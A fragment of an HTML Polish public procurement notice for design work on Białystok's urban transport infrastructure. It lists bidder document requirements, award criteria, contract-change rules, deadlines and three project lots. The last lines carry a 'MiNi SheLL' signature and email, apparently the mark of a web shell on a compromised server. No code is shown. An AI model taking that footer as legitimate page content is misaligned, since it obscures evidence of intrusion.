<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia: 1) każdy wykonawca zobowiązany jest złożyć oddzielnie dokument określony w sekcji III.4.2) tirtet 2 oraz dokument określony w sekcji III.4.4) tirtet 1, 2) warunki dotyczące posiadania wiedzy i doświadczenia oraz dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia będą badane łącznie - dokumenty określone w sekcji III.4.1) tirtet 1-3 powinien złożyć co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia, 3) oświadczenie o spełnieniu warunków udziału w postępowaniu określone w sekcji III.4.1) oraz oświadczenie o nie podleganiu wykluczeniu określone w sekcji III.4.2) tirtet 2) składa pełnomocnik wykonawców wspólnie ubiegających się o udzielenie zamówienia w ich imieniu bądź każdy z wykonawców oddzielnie. 2. Zgodnie z art. 26 ust. 2b ustawy, wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów (w formie oryginału lub notarialnie poświadczonej kopii) do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia (na lub wg załącznika 6 do SIWZ) oraz dokumenty potwierdzające, że osoba podpisująca takie zobowiązanie była uprawniona do działania w imieniu podmiotu trzeciego (ewentualne pełnomocnictwo należy złożyć w formie oryginału lub kopii poświadczonej notarialnie za zgodność z oryginałem). Kopie dokumentów dotyczących podmiotu trzeciego, muszą być poświadczone za zgodność z oryginałem przez te podmioty. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b ustawy, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie tych zasobów nie ponosi winy. 3. Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia w stopniu niezbędnym dla należytego wykonania zamówienia oraz, że stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, przedkładając w tym celu dokumenty dotyczące w szczególności: 1) zakresu dostępnych wykonawcy zasobów innego podmiotu, 2) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, 3) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, 4) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. Udostępnienie wykonawcy potencjału wiedzy i doświadczenia przez podmiot trzeci wiąże się z udziałem podmiotu trzeciego przy realizacji zamówienia, np. w formie podwykonawstwa, konsultacji, doradztwa. 4. Dowodami, o których mowa powyżej są: 1) poświadczenie, 2) oświadczenie wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia o których mowa w ppkt 1. W przypadku, gdy zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów. 5. Jeżeli w kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w Sekcji III.4.3.1), zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem; dokumenty, o których mowa, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; w przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do właściwych organów odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Organizacja pracy zespołu - 40</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany niniejszej umowy wymagają dla swej ważności formy pisemnej pod rygorem nieważności i będą dopuszczalne w granicach art. 144 Prawo zamówień publicznych. 2. Zamawiający dopuszcza zmianę wysokości wynagrodzenia należnego Wykonawcy w przypadku zmiany: 1) stawki podatku VAT, wprowadzonej powszechnie obowiązującymi przepisami prawa, z tym, że cena netto nie może ulec podwyższeniu, 2) wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3 - 5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, 3) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne - jeżeli zmiany te będą miały wpływ na koszty wykonania przez wykonawcę zamówienia publicznego, wynikającego z zawartej umowy na okres dłuższy niż 12 miesięcy, każda ze stron umowy, w terminie od dnia opublikowania przepisów dokonujących tych zmian do 30 dnia od dnia ich wejścia w życie, może zwrócić się do drugiej strony o przeprowadzenie negocjacji w sprawie odpowiedniej zmiany wynagrodzenia. Zmiana umowy na podstawie ustaleń negocjacyjnych może nastąpić po wejściu w życie przepisów będących przyczyną waloryzacji. 3. W razie zmiany, o której mowa w ust. 2 pkt 2, przez pojęcie    odpowiedniej zmiany wynagrodzenia    należy rozumieć sumę wzrostu kosztów wykonawcy zamówienia publicznego wynikających z podwyższenia wynagrodzeń poszczególnych pracowników biorących udział w realizacji pozostałej do wykonania, w momencie wejścia w życie zmiany, części zamówienia, do wysokości wynagrodzenia minimalnego obowiązującej po zmianie przepisów lub jej odpowiedniej części, w przypadku osób zatrudnionych w wymiarze niższym niż pełen etat. 4. W razie zmiany wskazanej w ust. 2 pkt 3, przez pojęcie    odpowiedniej zmiany wynagrodzenia    należy rozumieć sumę wzrostu kosztów wykonawcy zamówienia publicznego oraz drugiej strony umowy o pracę lub innej umowy cywilnoprawnej łączącej wykonawcę zamówienia publicznego z osobą fizyczną nieprowadzącą działalności gospodarczej, wynikających z konieczności odprowadzenia dodatkowych składek od wynagrodzeń osób zatrudnionych na umowę o pracę lub na podstawie innej umowy cywilnoprawnej zawartej przez wykonawcę z osobą fizyczną nieprowadzącą działalności gospodarczej, a biorących udział w realizacji pozostałej do wykonania, w momencie wejścia w życie zmiany, części zamówienia przy założeniu braku zmiany wynagrodzenia netto tych osób. 5. W razie zamówień realizowanych wspólnie przez kilku wykonawców lub realizowanych przy pomocy podwykonawców przepisy ust.2-4 stosuje się odpowiednio. 6. Warunkiem dokonania zmiany, o której mowa w ust. 2-5, jest złożenie uzasadnionego wniosku przez stronę inicjującą zmianę wraz z opisem okoliczności stanowiących podstawę do dokonania takiej zmiany. 7. Wykonawca może dokonywać zmiany osób przedstawionych w ofercie, jedynie za uprzednią zgodą Zamawiającego, akceptującego nowe osoby. Zmiana którejkolwiek z osób, o których mowa w zdaniu poprzednim, w trakcie realizacji przedmiotowej umowy musi być uzasadniona przez Wykonawcę na piśmie i wymaga zaakceptowania przez Zamawiającego. Nowe osoby muszą posiadać doświadczenie takie same lub wyższe od doświadczenia wymaganego w SIWZ. 8. Zamawiający może zażądać od Wykonawcy zmiany osób przedstawionych w ofercie, jeżeli uzna, że nie wykonują one swoich obowiązków wynikających z umowy. 9. Zaakceptowana przez Zamawiającego zmiana którejkolwiek z osób przedstawionych w ofercie wymaga sporządzenia aneksu do umowy. 10. Wykonawca może dokonywać zmiany podmiotu trzeciego jedynie za uprzednią zgodą Zamawiającego, akceptującego nowy podmiot. Nowy podmiot musi spełniać warunki określone w SIWZ w zakresie jakim Wykonawca polegał na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy. 11. Zaakceptowana przez Zamawiającego zmiana któregokolwiek podmiotu trzeciego wymaga sporządzenia aneksu do niniejszej umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Białymstoku, Biuro Funduszy Europejskich, ul. Słonimska 1 pok. 902..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.07.2016 godzina 09:00, miejsce: Urząd Miejski w Białymstoku, Biuro Funduszy Europejskich, ul. Słonimska 1 pok. 902..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Intermodalny węzeł komunikacyjny w Białymstoku (centrum przesiadkowe wraz z korytarzami publicznego transportu zbiorowego).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy projektu: 1) utworzenie centrum przesiadkowego w Białymstoku w okolicy dworców PKP i PKS, wraz z niezbędną infrastrukturą ITS; 2) budowę przebudowę układu drogowego wokół centrum zapewniającego sprawne funkcjonowanie komunikacji miejskiej, wraz z działaniami mającymi na celu uprzywilejowanie autobusów komunikacji miejskiej w ruchu, w tym: budowa tunelu dla autobusów, rowerów i pieszych pod torami PKP na przedłużeniu ul. Św. Rocha i ul. Zwycięstwa, przebudowa skrzyżowania ul. Zwycięstwa ul. Kolejowa, przebudowa skrzyżowania ul. Bohaterów Monte Cassino ul. kard. S. Wyszyńskiego, budowa skrzyżowania ul. Bohaterów Monte Cassino ul. Łomżyńska, przebudowa skrzyżowania ul. Bohaterów Monte Cassino ul. M. Kopernika, przebudowa skrzyżowania ul. Łomżyńska ul. M. Kopernika, przebudowa ul. Św. Rocha, przebudowa ul. Bohaterów Monte Cassino, budowa przedłużenia ul. Bohaterów Monte Cassino, przebudowa ul. Łomżyńskiej, budowa ul. Młynowej. 3) zakup 20 szt. niskoemisyjnego taboru..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Orgaznizacja pracy zespołu - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Poprawa dostępności centrum Białegostoku dla komunikacji miejskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy projektu: 1) Rozwój korytarzy autobusu wysokiej jakości ułatwiające dostęp do centrum miasta dla komunikacji miejskiej: budowa ul. Sitarskiej (od ul. Kozłowej do ul. Świętokrzyskiej), przebudowa ul. Jurowieckiej (od ul. Ciepłej do ul. Poleskiej), przebudowa Al. 1000 -lecia Państwa Polskiego, 2) zakup 20 szt. niskoemisyjnego taboru, 3) kampania promocyjno - informacyjna dot. komunikacji miejskiej i rowerowej. Stan przygotowania projektu do realizacji: Projekt podzielono na pięć zadań inwestycyjnych: 1. budowa ul. Sitarskiej; 2. przebudowa Al. 1000 -lecia Państwa Polskiego; 3. przebudowa ul. Jurowieckiej; 4. kampania promocyjna; 5. zakup niskoemisyjnego taboru..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Orgaznizacja pracy zespołu - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Rozwój infrastruktury transportu miejskiego w Białymstoku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy projektu: 1) Rozwój Korytarzy Autobusu Wysokiej Jakości w Białymstoku: przebudowa ul. Wiosennej wraz z budową pętli autobusowej, przebudowa ul. Legionowej (od ul. Cieszyńskiej do ul. M. Skłodowskiej - Curie), przebudowa ul. J.K. Branickiego wraz z budową pętli autobusowej w okolicy ul. Piastowskiej. 2) Rozbudowa systemu transportu publicznego w Białymstoku, na potrzeby gmin BOF, budowa infrastruktury drogowej i przystankowej mającej na celu uruchomienie nowych połączeń lub utrzymania dotychczasowych, pomiędzy Białymstokiem a osiedlami zlokalizowanymi na terenie gmin obszaru funkcjonalnego: budowa ul. Gminnej, przebudowa ul. A. Mickiewicza, budowa wlotu drogi z Hryniewicz do ul. K. Ciołkowskiego, przebudowa ul. K. Pułaskiego, przebudowa ul. Klepackiej wraz z budową tunelu, 3) budowa ulicy łączącej ul. Elewatorską z miejscowością Porosły w granicach miasta), 4) przebudowa ul. Produkcyjnej; 5) zakup 20 szt. niskoemisyjnego taboru; 6) infrastruktura na potrzeby pasażerów komunikacji miejskiej (wiaty przystankowe, system dynamicznej informacji pasażerskiej, biletomaty stacjonarne i w autobusach, system windykacji i kontroli, karta miejska, utworzenie P&R w okolicy ul. K. Ciołkowskiego ul. Wiosennej na ok 100-150 miejsc)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Orgaznizacja pracy zespołu - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com